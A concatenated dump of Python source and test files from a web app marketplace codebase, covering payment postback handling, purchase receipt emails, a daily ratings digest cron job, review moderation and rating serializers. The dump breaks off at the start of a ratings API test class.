    def post(self, req=None):
        # POST a signed notice to the postback URL; defaults to a JWT
        # signed with the dev secret.
        if not req:
            req = self.jwt()
        return self.client.post(reverse('webpay.postback'),
                                data={'notice': req})

    def jwt_dict(self, expiry=3600, issued_at=None, contrib_uuid=None):
        # Build the claim set webpay would send back for this contribution.
        if not issued_at:
            issued_at = calendar.timegm(time.gmtime())
        if not contrib_uuid:
            contrib_uuid = self.contrib.uuid
        return {
            'iss': 'mozilla',
            'aud': self.webpay_dev_id,
            'typ': 'mozilla/payments/inapp/v1',
            'iat': issued_at,
            'exp': issued_at + expiry,
            'request': {
                'name': 'Some App',
                'description': 'fantastic app',
                'pricePoint': '1',
                'currencyCode': 'USD',
                'postbackURL': '/postback',
                'chargebackURL': '/chargeback',
                # The uuid links the notice back to the contribution.
                'productData': 'contrib_uuid=%s' % contrib_uuid
            },
            'response': {
                'transactionID': '<webpay-trans-id>',
                'price': {'amount': '10.99', 'currency': 'BRL'}
            },
        }

    def jwt(self, req=None, **kw):
        if not req:
            req = self.jwt_dict(**kw)
        return jwt.encode(req, self.webpay_dev_secret)

    @mock.patch('lib.crypto.webpay.jwt.decode')
    def test_valid(self, decode, tasks):
        jwt_dict = self.jwt_dict()
        jwt_encoded = self.jwt(req=jwt_dict)
        decode.return_value = jwt_dict
        resp = self.post(req=jwt_encoded)
        decode.assert_called_with(jwt_encoded, ANY)
        eq_(resp.status_code, 200)
        eq_(resp.content, '<webpay-trans-id>')
        # The contribution is promoted to a purchase using the amount and
        # currency webpay reported, and a receipt email is queued.
        cn = Contribution.objects.get(pk=self.contrib.pk)
        eq_(cn.type, amo.CONTRIB_PURCHASE)
        eq_(cn.transaction_id, '<webpay-trans-id>')
        eq_(cn.amount, Decimal('10.99'))
        eq_(cn.currency, 'BRL')
        tasks.send_purchase_receipt.delay.assert_called_with(cn.pk)

    @mock.patch('lib.crypto.webpay.jwt.decode')
    def test_valid_duplicate(self, decode, tasks):
        # Re-posting the same transaction is idempotent: 200, no second
        # receipt email.
        jwt_dict = self.jwt_dict()
        jwt_encoded = self.jwt(req=jwt_dict)
        decode.return_value = jwt_dict
        self.contrib.update(type=amo.CONTRIB_PURCHASE,
                            transaction_id='<webpay-trans-id>')
        resp = self.post(req=jwt_encoded)
        eq_(resp.status_code, 200)
        eq_(resp.content, '<webpay-trans-id>')
        assert not tasks.send_purchase_receipt.delay.called

    @mock.patch('lib.crypto.webpay.jwt.decode')
    def test_invalid_duplicate(self, decode, tasks):
        # A different trans_id for an already-paid contribution must fail.
        jwt_dict = self.jwt_dict()
        jwt_dict['response']['transactionID'] = '<some-other-trans-id>'
        jwt_encoded = self.jwt(req=jwt_dict)
        decode.return_value = jwt_dict
        self.contrib.update(type=amo.CONTRIB_PURCHASE,
                            transaction_id='<webpay-trans-id>')
        with self.assertRaises(LookupError):
            self.post(req=jwt_encoded)
        assert not tasks.send_purchase_receipt.delay.called

    def test_invalid(self, tasks):
        # Without the decode mock, the real signature check rejects the
        # notice and the contribution stays pending.
        resp = self.post()
        eq_(resp.status_code, 400)
        cn = Contribution.objects.get(pk=self.contrib.pk)
        eq_(cn.type, amo.CONTRIB_PENDING)

    def test_empty_notice(self, tasks):
        resp = self.client.post(reverse('webpay.postback'), data={})
        eq_(resp.status_code, 400)

    @raises(RequestExpired)
    @fudge.patch('lib.crypto.webpay.jwt.decode')
    def test_invalid_claim(self, tasks, decode):
        iat = calendar.timegm(time.gmtime()) - 3601  # too old
        decode.expects_call().returns(self.jwt_dict(issued_at=iat))
        self.post()

    @raises(LookupError)
    @fudge.patch('mkt.purchase.webpay.parse_from_webpay')
    def test_unknown_contrib(self, tasks, parse_from_webpay):
        example = self.jwt_dict()
        example['request']['productData'] = 'contrib_uuid=<bogus>'
        parse_from_webpay.expects_call().returns(example)
        self.post()
########NEW FILE########
__FILENAME__ = test_webpay_tasks
import uuid
from django.core import mail
from mock import patch
from nose.tools import eq_, ok_
import amo
from stats.models import Contribution
from mkt.purchase import tasks as tasks
from utils import PurchaseTest
class TestReceiptEmail(PurchaseTest):
    """Tests for the send_purchase_receipt task."""

    def setUp(self):
        super(TestReceiptEmail, self).setUp()
        self.contrib = Contribution.objects.create(addon_id=self.addon.id,
                                                   amount=self.price.price,
                                                   uuid=str(uuid.uuid4()),
                                                   type=amo.CONTRIB_PURCHASE,
                                                   user=self.user,
                                                   source_locale='en-us')

    def test_send(self):
        tasks.send_purchase_receipt(self.contrib.pk)
        eq_(len(mail.outbox), 1)

    def test_localized_send(self):
        # The receipt is rendered in the purchaser's language (Spanish).
        self.contrib.user.lang = 'es'
        self.contrib.user.save()
        tasks.send_purchase_receipt(self.contrib.pk)
        assert 'Precio' in mail.outbox[0].body
        assert 'Algo Algo' in mail.outbox[0].body

    @patch('mkt.purchase.tasks.send_html_mail_jinja')
    def test_data(self, send_mail_jinja):
        # Inspect the template context handed to the mail helper.
        with self.settings(SITE_URL='http://f.com'):
            tasks.send_purchase_receipt(self.contrib.pk)
        args = send_mail_jinja.call_args
        data = args[0][3]
        eq_(args[1]['recipient_list'], [self.user.email])
        eq_(data['app_name'], self.addon.name)
        eq_(data['developer_name'], self.addon.current_version.developer_name)
        eq_(data['price'], self.contrib.get_amount_locale('en_US'))
        ok_(data['purchases_url'].startswith('http://f.com'))
########NEW FILE########
__FILENAME__ = utils
from decimal import Decimal
import mock
import amo.tests
from addons.models import Addon
from mkt.inapp.models import InAppProduct
from mkt.developers.models import (AddonPaymentAccount, PaymentAccount,
SolitudeSeller)
from mkt.site.fixtures import fixture
from mkt.prices.models import AddonPremium, Price, PriceCurrency
from users.models import UserProfile
class PurchaseTest(amo.tests.TestCase):
    """Base TestCase for purchase flows: logs in a regular user and turns
    fixture webapp 337141 into a premium app wired to a price tier, a
    payment account and a mocked Solitude generic product."""
    fixtures = fixture('prices', 'user_admin', 'user_999', 'webapp_337141')

    def setUp(self):
        self.setup_base()
        assert self.client.login(username='[email protected]',
                                 password='password')
        self.user = UserProfile.objects.get(email='[email protected]')
        self.brl = PriceCurrency.objects.create(currency='BRL',
                                                price=Decimal('0.5'),
                                                tier_id=1)
        self.setup_package()
        self.setup_mock_generic_product()
        self.setup_public_id()

    def setup_base(self):
        # Make the fixture app premium and attach tier-1 pricing.
        self.addon = Addon.objects.get(pk=337141)
        self.addon.update(premium_type=amo.ADDON_PREMIUM)
        self.price = Price.objects.get(pk=1)
        AddonPremium.objects.create(addon=self.addon, price=self.price)
        # Refetch addon from the database to populate addon.premium field.
        self.addon = Addon.objects.get(pk=self.addon.pk)

    def setup_package(self):
        # Build the seller -> payment account -> app payment account chain.
        self.seller = SolitudeSeller.objects.create(
            resource_uri='/path/to/sel', uuid='seller-id', user=self.user)
        self.account = PaymentAccount.objects.create(
            user=self.user, uri='asdf', name='test', inactive=False,
            solitude_seller=self.seller, account_id=123)
        AddonPaymentAccount.objects.create(
            addon=self.addon, account_uri='foo',
            payment_account=self.account, product_uri='bpruri')

    def setup_mock_generic_product(self):
        # Avoid real Solitude API calls during tests.
        patched_product = mock.patch(
            'mkt.developers.providers.Provider.generic')
        self.mock_product = patched_product.start()
        self.addCleanup(patched_product.stop)

    def setup_public_id(self):
        self.public_id = 'public-id-set-in-devhub'
        self.addon.update(solitude_public_id=self.public_id)
class InAppPurchaseTest(PurchaseTest):
    """PurchaseTest variant that also attaches an in-app product to the
    premium webapp."""

    def setup_base(self):
        super(InAppPurchaseTest, self).setup_base()
        self.inapp = InAppProduct.objects.create(
            logo_url='logo.png', name='Inapp Object', price=self.price,
            webapp=self.addon)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from . import webpay
# These URLs are attached to /services
webpay_services_patterns = patterns(
'',
url('^postback$', webpay.postback, name='webpay.postback'),
url('^chargeback$', webpay.chargeback, name='webpay.chargeback'),
)
# These URLs get attached to the app details URLs.
app_purchase_patterns = patterns(
'',
url('^webpay/prepare_pay$', webpay.prepare_pay,
name='webpay.prepare_pay'),
url('^webpay/pay_status/(?P<contrib_uuid>[^/]+)$', webpay.pay_status,
name='webpay.pay_status'),
)
urlpatterns = patterns(
'',
# TODO: Port these views.
#url('^thanks/$', views.purchase_thanks, name='purchase.thanks'),
#url('^error/$', views.purchase_error, name='purchase.error'),
('', include(app_purchase_patterns)),
)
########NEW FILE########
__FILENAME__ = webpay
import sys
import urlparse
import uuid
from decimal import Decimal
from django import http
from django.views.decorators.csrf import csrf_exempt
import commonware.log
from addons.decorators import addon_view_factory
import amo
from amo.decorators import json_view, login_required, post_required, write
from lib.cef_loggers import app_pay_cef
from lib.crypto.webpay import InvalidSender, parse_from_webpay
from mkt.api.exceptions import AlreadyPurchased
from mkt.purchase.decorators import can_be_purchased
from mkt.webapps.models import Webapp
from mkt.webpay.webpay_jwt import get_product_jwt, WebAppProduct
from stats.models import Contribution
from . import tasks
log = commonware.log.getLogger('z.purchase')
# Resolve app slugs/ids against the `valid` webapp queryset only.
addon_view = addon_view_factory(qs=Webapp.objects.valid)
@login_required
@addon_view
@write
@post_required
@json_view
@can_be_purchased
def prepare_pay(request, addon):
    """
    Start a webpay purchase: create a pending Contribution for this
    user/app pair and return (as JSON) the signed JWT the client hands to
    webpay.

    Raises AlreadyPurchased if the user already owns the premium app.
    """
    if addon.is_premium() and addon.has_purchased(request.amo_user):
        log.info('Already purchased: %d' % addon.pk)
        raise AlreadyPurchased
    app_pay_cef.log(request, 'Preparing JWT', 'preparing_jwt',
                    'Preparing JWT for: %s' % (addon.pk), severity=3)
    log.debug('Starting purchase of app: {0} by user: {1}'.format(
        addon.pk, request.amo_user))
    # The uuid ties the eventual webpay postback back to this contribution.
    contribution = Contribution.objects.create(
        addon_id=addon.pk,
        amount=addon.get_price(region=request.REGION.id),
        paykey=None,
        price_tier=addon.premium.price,
        source=request.REQUEST.get('src', ''),
        source_locale=request.LANG,
        type=amo.CONTRIB_PENDING,
        user=request.amo_user,
        uuid=str(uuid.uuid4()),
    )
    log.debug('Storing contrib for uuid: {0}'.format(contribution.uuid))
    return get_product_jwt(WebAppProduct(addon), contribution)
@login_required
@addon_view
@write
@json_view
def pay_status(request, addon, contrib_uuid):
    """
    Return JSON dict of {status: complete|incomplete}.

    The status of the payment is only complete when it exists by uuid,
    was purchased by the logged in user, and has been marked paid by the
    JWT postback. After that the UI is free to call app/purchase/record
    to generate a receipt.
    """
    au = request.amo_user
    # The addonpurchase join restricts matches to the logged-in purchaser.
    qs = Contribution.objects.filter(uuid=contrib_uuid,
                                     addon__addonpurchase__user=au,
                                     type=amo.CONTRIB_PURCHASE)
    return {'status': 'complete' if qs.exists() else 'incomplete'}
@csrf_exempt
@write
@post_required
def postback(request):
"""Verify signature and set contribution to paid."""
signed_jwt = request.POST.get('notice', '')
try:
data = parse_from_webpay(signed_jwt, request.META.get('REMOTE_ADDR'))
except InvalidSender, exc:
app_pay_cef.log(request, 'Unknown app', 'invalid_postback',
'Ignoring invalid JWT %r: %s' % (signed_jwt, exc),
severity=4)
return http.HttpResponseBadRequest()
pd = urlparse.parse_qs(data['request']['productData'])
contrib_uuid = pd['contrib_uuid'][0]
try:
contrib = Contribution.objects.get(uuid=contrib_uuid)
except Contribution.DoesNotExist:
etype, val, tb = sys.exc_info()
raise LookupError('JWT (iss:%s, aud:%s) for trans_id %s '
'links to contrib %s which doesn\'t exist'
% (data['iss'], data['aud'],
data['response']['transactionID'],
contrib_uuid)), None, tb
trans_id = data['response']['transactionID']
if contrib.transaction_id is not None:
if contrib.transaction_id == trans_id:
app_pay_cef.log(request, 'Repeat postback', 'repeat_postback',
'Postback sent again for: %s' % (contrib.addon.pk),
severity=4)
return http.HttpResponse(trans_id)
else:
app_pay_cef.log(request, 'Repeat postback with new trans_id',
'repeat_postback_new_trans_id',
'Postback sent again for: %s, but with new '
'trans_id: %s' % (contrib.addon.pk, trans_id),
severity=7)
raise LookupError('JWT (iss:%s, aud:%s) for trans_id %s is for '
'contrib %s that is already paid and has '
'existing differnet trans_id: %s'
% (data['iss'], data['aud'],
data['response']['transactionID'],
contrib_uuid, contrib.transaction_id))
log.info('webpay postback: fulfilling purchase for contrib %s with '
'transaction %s' % (contrib, trans_id))
app_pay_cef.log(request, 'Purchase complete', 'purchase_complete',
'Purchase complete for: %s' % (contrib.addon.pk),
severity=3)
contrib.update(transaction_id=trans_id, type=amo.CONTRIB_PURCHASE,
amount=Decimal(data['response']['price']['amount']),
currency=data['response']['price']['currency'])
tasks.send_purchase_receipt.delay(contrib.pk)
return http.HttpResponse(trans_id)
@csrf_exempt
@write
@post_required
def chargeback(request):
    """
    Verify signature from and create a refund contribution tied
    to the original transaction.

    Not implemented yet: webpay chargeback postbacks currently error out.
    """
    raise NotImplementedError
########NEW FILE########
__FILENAME__ = cron
import datetime
from django.conf import settings
import commonware.log
import cronjobs
import amo
from amo.utils import send_mail_jinja
from reviews.models import Review
cron_log = commonware.log.getLogger('mkt.ratings.cron')
@cronjobs.register
def email_daily_ratings():
    """
    Does email for yesterday's ratings (right after the day has passed).
    Sends an email containing all reviews for that day for certain app.

    One digest email is sent per app that received reviews yesterday, to
    all of that app's authors.
    """
    # Compute yesterday's [midnight, midnight) window.
    dt = datetime.datetime.today() - datetime.timedelta(1)
    yesterday = datetime.datetime(dt.year, dt.month, dt.day, 0, 0, 0)
    today = yesterday + datetime.timedelta(1)
    pretty_date = '%04d-%02d-%02d' % (dt.year, dt.month, dt.day)
    yesterday_reviews = Review.objects.filter(created__gte=yesterday,
                                              created__lt=today,
                                              addon__type=amo.ADDON_WEBAPP)
    # For each app in yesterday's set of reviews, gather reviews and email out.
    apps = set(review.addon for review in yesterday_reviews)
    for app in apps:
        # Email all reviews in one email for current app in loop.
        author_emails = app.authors.values_list('email', flat=True)
        subject = 'Firefox Marketplace reviews for %s on %s' % (app.name,
                                                                pretty_date)
        context = {'reviews': (yesterday_reviews.filter(addon=app).
                               order_by('-created')),
                   'base_url': settings.SITE_URL,
                   'pretty_date': pretty_date}
        # async=True presumably defers sending to the task queue -- confirm.
        send_mail_jinja(subject, 'ratings/emails/daily_digest.html',
                        context, recipient_list=author_emails,
                        perm_setting='app_new_review', async=True)
########NEW FILE########
__FILENAME__ = forms
from django import forms
from django.forms.models import modelformset_factory
import happyforms
from quieter_formset.formset import BaseModelFormSet
from tower import ugettext_lazy as _lazy
import amo
from editors.models import ReviewerScore
from reviews.models import Review
from mkt.ratings import (REVIEW_MODERATE_DELETE, REVIEW_MODERATE_KEEP,
REVIEW_MODERATE_SKIP)
from mkt.ratings.helpers import user_can_delete_review
class BaseReviewFlagFormSet(BaseModelFormSet):
    """Formset backing the review moderation queue: each form carries a
    keep/skip/delete decision for one flagged review."""

    def __init__(self, *args, **kwargs):
        self.form = ModerateReviewFlagForm
        # Request is needed for permission checks and reviewer points.
        self.request = kwargs.pop('request', None)
        super(BaseReviewFlagFormSet, self).__init__(*args, **kwargs)

    def save(self):
        """Apply each moderation decision, logging the action and awarding
        ReviewerScore moderation points for kept/deleted reviews."""
        for form in self.forms:
            if form.cleaned_data and user_can_delete_review(self.request,
                                                            form.instance):
                action = int(form.cleaned_data['action'])
                is_flagged = (form.instance.reviewflag_set.count() > 0)
                if action != REVIEW_MODERATE_SKIP:  # Delete flags.
                    for flag in form.instance.reviewflag_set.all():
                        flag.delete()
                review = form.instance
                addon = review.addon
                if action == REVIEW_MODERATE_DELETE:
                    # Capture addon/id before deleting so the log entry
                    # can still reference the deleted review.
                    review_addon = review.addon
                    review_id = review.id
                    review.delete()
                    amo.log(amo.LOG.DELETE_REVIEW, review_addon, review_id,
                            details=dict(title=unicode(review.title),
                                         body=unicode(review.body),
                                         addon_id=addon.id,
                                         addon_title=unicode(addon.name),
                                         is_flagged=is_flagged))
                    if self.request:
                        ReviewerScore.award_moderation_points(
                            self.request.amo_user, addon, review_id)
                elif action == REVIEW_MODERATE_KEEP:
                    # Keeping clears the editor-review flag on the review.
                    review.editorreview = False
                    review.save()
                    amo.log(amo.LOG.APPROVE_REVIEW, review.addon, review,
                            details=dict(title=unicode(review.title),
                                         body=unicode(review.body),
                                         addon_id=addon.id,
                                         addon_title=unicode(addon.name),
                                         is_flagged=is_flagged))
                    if self.request:
                        ReviewerScore.award_moderation_points(
                            self.request.amo_user, addon, review.id)
class ModerateReviewFlagForm(happyforms.ModelForm):
    """Per-review moderation form offering keep / skip / delete."""
    action_choices = [
        (REVIEW_MODERATE_KEEP, _lazy(u'Keep review; remove flags')),
        (REVIEW_MODERATE_SKIP, _lazy(u'Skip for now')),
        (REVIEW_MODERATE_DELETE, _lazy(u'Delete review'))]
    # Not required, so untouched rows still validate; initial=0 --
    # presumably REVIEW_MODERATE_KEEP, confirm against mkt.ratings.
    action = forms.ChoiceField(choices=action_choices, required=False,
                               initial=0, widget=forms.RadioSelect())

    class Meta:
        model = Review
        fields = ('action',)
# Formset used by the moderation queue: one ModerateReviewFlagForm per
# flagged review, with no extra blank forms.
ReviewFlagFormSet = modelformset_factory(Review, extra=0,
                                         form=ModerateReviewFlagForm,
                                         formset=BaseReviewFlagFormSet)
########NEW FILE########
__FILENAME__ = helpers
import jingo
import jinja2
from tower import ugettext as _
from access import acl
@jingo.register.filter
def stars(num, large=False):
    """Render the 1-5 star rating snippet for `num`; `large` selects the
    detail-page variant.

    Treats both None and 0.0 as "not yet rated" -- the 0.0 check covers a
    None that was cast to float, and is safe because the lowest real
    rating is 1.0.
    """
    if num is None or num == 0.0:
        return _('Not yet rated')
    rating = min(5, int(round(num)))
    template = jingo.env.get_template('reviews/impala/reviews_rating.html')
    # The template names these `rating` and `detailpage` for contextual
    # sense.
    return jinja2.Markup(template.render({'rating': rating,
                                          'detailpage': large}))
@jingo.register.function
def impala_reviews_link(addon):
    """Render the impala reviews-link snippet for `addon`."""
    template = jingo.env.get_template('reviews/impala/reviews_link.html')
    return jinja2.Markup(template.render({'addon': addon}))
def user_can_delete_review(request, review):
    """Return whether or not the request.user can delete reviews.

    People who can delete reviews:
    * The original review author.
    * Editors, but only if they aren't listed as an author of the add-on.
    * Users in a group with "Users:Edit" privileges.
    * Users in a group with "Addons:Edit" privileges.

    TODO: Make this more granular when we have multiple reviewer types,
    e.g. persona reviewers shouldn't be able to delete add-on reviews.
    """
    is_editor = acl.check_reviewer(request)
    is_author = review.addon.has_author(request.user)
    if review.user_id == request.user.id:
        return True
    if is_author:
        # Add-on authors never get the privileged paths below.
        return False
    return (is_editor or
            acl.action_allowed(request, 'Users', 'Edit') or
            acl.action_allowed(request, 'Addons', 'Edit'))
########NEW FILE########
__FILENAME__ = serializers
from django.core.urlresolvers import reverse
from rest_framework import serializers
from rest_framework.exceptions import PermissionDenied
from reviews.models import Review, ReviewFlag
from mkt.account.serializers import AccountSerializer
from mkt.api.fields import SlugOrPrimaryKeyRelatedField, SplitField
from mkt.api.exceptions import Conflict
from mkt.regions import get_region
from mkt.versions.serializers import SimpleVersionSerializer
from mkt.webapps.models import Webapp
class RatingSerializer(serializers.ModelSerializer):
    """DRF serializer for app reviews ("ratings").

    Adds viewer-relative fields (is_author, has_flagged) for authenticated
    requests and enforces the create-time business rules in validate().
    """
    # Accepts an app slug or pk on input; serializes to the app-detail URL.
    app = SplitField(
        SlugOrPrimaryKeyRelatedField(slug_field='app_slug',
                                     queryset=Webapp.objects.all(),
                                     source='addon'),
        serializers.HyperlinkedRelatedField(view_name='app-detail',
                                            read_only=True, source='addon'))
    body = serializers.CharField()
    user = AccountSerializer(read_only=True)
    report_spam = serializers.SerializerMethodField('get_report_spam_link')
    resource_uri = serializers.HyperlinkedIdentityField(
        view_name='ratings-detail')
    is_author = serializers.SerializerMethodField('get_is_author')
    has_flagged = serializers.SerializerMethodField('get_has_flagged')
    version = SimpleVersionSerializer(read_only=True)

    class Meta:
        model = Review
        fields = ('app', 'body', 'created', 'has_flagged', 'is_author',
                  'modified', 'rating', 'report_spam', 'resource_uri', 'user',
                  'version')

    def __init__(self, *args, **kwargs):
        super(RatingSerializer, self).__init__(*args, **kwargs)
        if 'request' in self.context:
            self.request = self.context['request']
        else:
            self.request = None
        # Viewer-relative fields only make sense for authenticated users.
        if not self.request or not self.request.amo_user:
            self.fields.pop('is_author')
            self.fields.pop('has_flagged')
        if self.request and self.request.method in ('PUT', 'PATCH'):
            # Don't let users modify 'app' field at edit time
            self.fields['app'].read_only = True

    def get_report_spam_link(self, obj):
        return reverse('ratings-flag', kwargs={'pk': obj.pk})

    def get_is_author(self, obj):
        return obj.user.pk == self.request.amo_user.pk

    def get_has_flagged(self, obj):
        # Authors can't flag their own review.
        return (not self.get_is_author(obj) and
                obj.reviewflag_set.filter(user=self.request.amo_user).exists())

    def validate(self, attrs):
        """Create-time checks: one review per user per app (per version for
        packaged apps), app must be public, available in the region, not
        authored by the reviewer, and purchased if premium."""
        if not getattr(self, 'object'):
            # If we are creating a rating, then we need to do various checks on
            # the app. Because these checks need the version as well, we have
            # to do them here and not in validate_app().
            # Assign user and ip_address. It won't change once the review is
            # created.
            attrs['user'] = self.request.amo_user
            attrs['ip_address'] = self.request.META.get('REMOTE_ADDR', '')
            # If the app is packaged, add in the current version.
            if attrs['addon'].is_packaged:
                attrs['version'] = attrs['addon'].current_version
            # Return 409 if the user has already reviewed this app.
            app = attrs['addon']
            amo_user = self.request.amo_user
            qs = self.context['view'].queryset.filter(addon=app, user=amo_user)
            if app.is_packaged:
                qs = qs.filter(version=attrs['version'])
            if qs.exists():
                raise Conflict('You have already reviewed this app.')
            # Return 403 is the app is not public.
            if not app.is_public():
                raise PermissionDenied('The app requested is not public.')
            # Return 403 if the user is attempting to review their own app.
            if app.has_author(amo_user):
                raise PermissionDenied('You may not review your own app.')
            # Return 403 if not a free app and the user hasn't purchased it.
            if app.is_premium() and not app.is_purchased(amo_user):
                raise PermissionDenied("You may not review paid apps you "
                                       "haven't purchased.")
            # Return 403 if the app is not available in the current region.
            current_region = get_region()
            if not app.listed_in(region=current_region):
                raise PermissionDenied('App not available in region "%s".' %
                                       current_region.slug)
        return attrs

    def validate_app(self, attrs, source):
        # Don't allow users to change the app on an existing rating.
        if getattr(self, 'object'):
            attrs[source] = self.object.addon
        return attrs
class RatingFlagSerializer(serializers.ModelSerializer):
    """Serializer for flagging a rating as spam/inappropriate.

    `user` and `review_id` are read-only and filled in from the request
    context; a user may flag a given review only once (409 otherwise).
    """
    user = serializers.Field()
    review_id = serializers.Field()

    class Meta:
        model = ReviewFlag
        fields = ('review_id', 'flag', 'note', 'user')

    def validate(self, attrs):
        # The flagging user and target review come from the request/view,
        # never from the client payload.
        attrs['user'] = self.context['request'].amo_user
        attrs['review_id'] = self.context['view'].kwargs['review']
        # A free-form note overrides whatever flag was submitted.
        if 'note' in attrs and attrs['note'].strip():
            attrs['flag'] = ReviewFlag.OTHER
        if ReviewFlag.objects.filter(review_id=attrs['review_id'],
                                     user=attrs['user']).exists():
            raise Conflict('You have already flagged this review.')
        return attrs
########NEW FILE########
__FILENAME__ = test_cron
# -*- coding: utf-8 -*-
import datetime
from django.conf import settings
from django.core import mail
from django.utils.encoding import smart_str
import mock
from nose.tools import eq_
from addons.models import AddonUser
import amo.tests
from mkt.ratings.cron import email_daily_ratings
from reviews.models import Review
from users.models import UserProfile
@mock.patch.object(settings, 'SEND_REAL_EMAIL', True)
class TestEmailDailyRatings(amo.tests.TestCase):
    """Tests for the email_daily_ratings cron: one digest email per app,
    containing only that app's reviews from the previous day."""
    fixtures = ['base/users']

    def setUp(self):
        self.app = amo.tests.app_factory(name='test')
        self.app2 = amo.tests.app_factory(name='test2')
        self.user = UserProfile.objects.get(username='regularuser')
        AddonUser.objects.create(addon=self.app, user=self.user)
        AddonUser.objects.create(addon=self.app2, user=self.user)
        yesterday = datetime.datetime.today() - datetime.timedelta(1)
        # Create one review for app, two reviews for app2, all back-dated to
        # yesterday so the daily cron picks them up.
        self.app1_review = Review.objects.create(
            addon=self.app, user=self.user, rating=1,
            body='sux, I want my money back.')
        self.app1_review.update(created=yesterday)
        self.app2_review = Review.objects.create(
            addon=self.app2, user=self.user, rating=4,
            body='waste of two seconds of my life.')
        self.app2_review.update(created=yesterday)
        self.app2_review2 = Review.objects.create(
            addon=self.app2, user=self.user, rating=5,
            body='a++ would play again')
        self.app2_review2.update(created=yesterday)

    def test_emails_goes_out(self):
        # Test first email have one rating, second email has two ratings.
        email_daily_ratings()
        eq_(len(mail.outbox), 2)
        eq_(mail.outbox[0].to, [self.user.email])
        eq_(mail.outbox[1].to, [self.user.email])
        eq_(str(self.app1_review.body) in smart_str(mail.outbox[0].body), True)
        eq_(str(self.app2_review.body) in smart_str(mail.outbox[1].body), True)
        eq_(str(self.app2_review2.body) in smart_str(mail.outbox[1].body),
            True)
        # Each digest must only contain its own app's reviews.
        eq_(str(self.app2_review.body) not in smart_str(mail.outbox[0].body),
            True)
        # BUG FIX: this assertion was a verbatim duplicate of the one above;
        # it should verify app1's review is absent from app2's email.
        eq_(str(self.app1_review.body) not in smart_str(mail.outbox[1].body),
            True)
########NEW FILE########
__FILENAME__ = test_helpers
from nose.tools import eq_
import jingo
from pyquery import PyQuery as pq
def setup():
    # nose module-level setup: register jingo template helpers (e.g. the
    # |stars filter exercised below) before any test runs.
    jingo.load_helpers()
def render(s, context=None):
    """Render the template string *s* through the jingo/Jinja environment.

    FIX: the default for *context* was a mutable dict literal (`{}`), which
    is shared across calls; use the None-sentinel idiom instead.  Behavior
    for all existing callers is unchanged.
    """
    if context is None:
        context = {}
    t = jingo.env.from_string(s)
    return t.render(context)
def test_stars():
    """The |stars filter: 'Not yet rated' for None, a star widget otherwise."""
    eq_(render('{{ num|stars }}', {'num': None}), 'Not yet rated')
    expected = 'Rated 1 out of 5 stars'
    node = pq(render('{{ num|stars }}', {'num': 1}))
    eq_(node.attr('class'), 'stars stars-1')
    eq_(node.attr('title'), expected)
    eq_(node.text(), expected)
def test_stars_details_page():
    """With large=True the widget carries the extra 'large' CSS class."""
    markup = render('{{ num|stars(large=True) }}', {'num': 2})
    eq_(pq(markup)('.stars').attr('class'), 'stars large stars-2')
def test_stars_max():
    """Ratings above 5 are clamped to the 5-star widget."""
    markup = render('{{ num|stars }}', {'num': 5.3})
    eq_(pq(markup).attr('class'), 'stars stars-5')
########NEW FILE########
__FILENAME__ = test_models
from django.utils import translation
from nose.tools import eq_
import test_utils
import amo.tests
from reviews.models import check_spam, Review, Spam
class TestReviewModel(amo.tests.TestCase):
    """Tests for Review's translated fields and locale fallback behavior."""
    fixtures = ['base/apps', 'base/platforms', 'reviews/test_models']

    def test_translations(self):
        # Fixture data: review 1 has en-US and de titles; review 2 only de.
        translation.activate('en-US')

        # There's en-US and de translations. We should get en-US.
        r1 = Review.objects.get(id=1)
        test_utils.trans_eq(r1.title, 'r1 title en', 'en-US')

        # There's only a de translation, so we get that.
        r2 = Review.objects.get(id=2)
        test_utils.trans_eq(r2.title, 'r2 title de', 'de')

        translation.activate('de')

        # en and de exist, we get de.
        r1 = Review.objects.get(id=1)
        test_utils.trans_eq(r1.title, 'r1 title de', 'de')

        # There's only a de translation, so we get that.
        r2 = Review.objects.get(id=2)
        test_utils.trans_eq(r2.title, 'r2 title de', 'de')
class TestSpamTest(amo.tests.TestCase):
    """Smoke tests for the review spam-checking helpers."""
    fixtures = ['base/apps', 'base/platforms', 'reviews/test_models']

    def test_create_not_there(self):
        # check_spam on a nonexistent review id must not blow up.
        Review.objects.all().delete()
        eq_(Review.objects.count(), 0)
        check_spam(1)

    def test_add(self):
        # Spam.add returns truthy when a review is recorded under a reason.
        assert Spam().add(Review.objects.all()[0], 'numbers')
########NEW FILE########
__FILENAME__ = test_validators
from django.core.exceptions import ValidationError
import amo.tests
from mkt.ratings.validators import validate_rating
class TestValidateRating(amo.tests.TestCase):
    """Unit tests for mkt.ratings.validators.validate_rating."""

    def test_valid(self):
        # Every whole-star score in the allowed 1-5 range must pass.
        for score in [1, 2, 3, 4, 5]:
            validate_rating(score)

    def test_invalid(self):
        # Out-of-range and non-integer scores must be rejected.
        for score in [-4, 0, 3.5, 6]:
            with self.assertRaises(ValidationError):
                validate_rating(score)
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
from datetime import datetime
import json
from urlparse import urlparse
from django.core.urlresolvers import reverse
from django.http import QueryDict
from mock import patch
from nose.tools import eq_, ok_
import amo
from addons.models import AddonUser
from devhub.models import ActivityLog
from reviews.models import Review, ReviewFlag
from users.models import UserProfile
import mkt.regions
from mkt.api.tests.test_oauth import RestOAuth
from mkt.site.fixtures import fixture
from mkt.webapps.models import AddonExcludedRegion, Webapp
from mkt.prices.models import AddonPurchase
class TestRatingResource(RestOAuth, amo.tests.AMOPaths):
    """Integration tests for the ratings API (list/detail, create, update,
    delete, flagging metadata), exercised through the OAuth test client.

    Fixture app pk=337141; `self.user` (pk=2519) is the authenticated
    client, `self.user2` (pk=31337) acts as "someone else".
    """
    fixtures = fixture('user_2519', 'webapp_337141')
    def setUp(self):
        super(TestRatingResource, self).setUp()
        self.app = Webapp.objects.get(pk=337141)
        self.user = UserProfile.objects.get(pk=2519)
        self.user2 = UserProfile.objects.get(pk=31337)
        self.list_url = reverse('ratings-list')
    # --- helpers -----------------------------------------------------------
    def _get_url(self, url, client=None, **kwargs):
        # GET `url` with kwargs as querystring params; returns (response,
        # parsed JSON body).  Defaults to the authenticated client.
        if client is None:
            client = self.client
        res = client.get(url, kwargs)
        data = json.loads(res.content)
        return res, data
    def _get_filter(self, client=None, expected_status=200, **params):
        # GET the list endpoint with filter params and assert the status;
        # on 200, also asserts exactly one result.
        res, data = self._get_url(self.list_url, client=client, **params)
        eq_(res.status_code, expected_status)
        if expected_status == 200:
            eq_(len(data['objects']), 1)
        return res, data
    # --- CORS / OPTIONS ----------------------------------------------------
